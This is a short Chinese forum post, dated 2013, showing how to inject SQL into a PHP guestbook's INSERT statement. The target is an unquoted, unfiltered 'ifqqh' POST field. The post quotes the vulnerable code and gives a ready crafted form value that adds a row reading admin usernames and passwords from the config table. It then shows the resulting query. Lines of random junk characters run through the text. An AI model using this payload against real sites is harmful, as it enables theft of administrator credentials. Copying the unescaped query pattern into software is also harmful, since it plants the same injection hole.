留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
2 X0 L3 B8 _$ x, O$ O* T, @# M, w$ o, H. F% w% O
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。6 k! J7 m; K$ p0 a" U1 t- j2 D6 O
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响0 I. f8 m0 S+ q, i
# x! a2 F! i. A5 E, s* Q; \/ c
提交的时候把ifqqh的值改一下。变成 ?& h: A l2 f$ {, p
3 ^. d' s- I2 V<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
1 X4 D& h0 r2 x$ B/ \+ e& _
' M! x r% {( Q2 K7 I+ c这样SQL插入语句就变了./ S$ {+ `2 p: _0 k8 E
8 ~5 M8 l5 \+ w. }4 i1 j$ ?insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)6 ]1 O" I9 r$ W4 V4 H# ]6 y7 V( T
9 Y4 p* s/ E* j
构造了另外一句SQL。并且把帐号密码读出来。) U& C3 G9 G! o+ N8 S
8 A+ V0 l' G9 o& f# Y
|
发表于 2013-2-19 08:10:11
收藏
支持
反对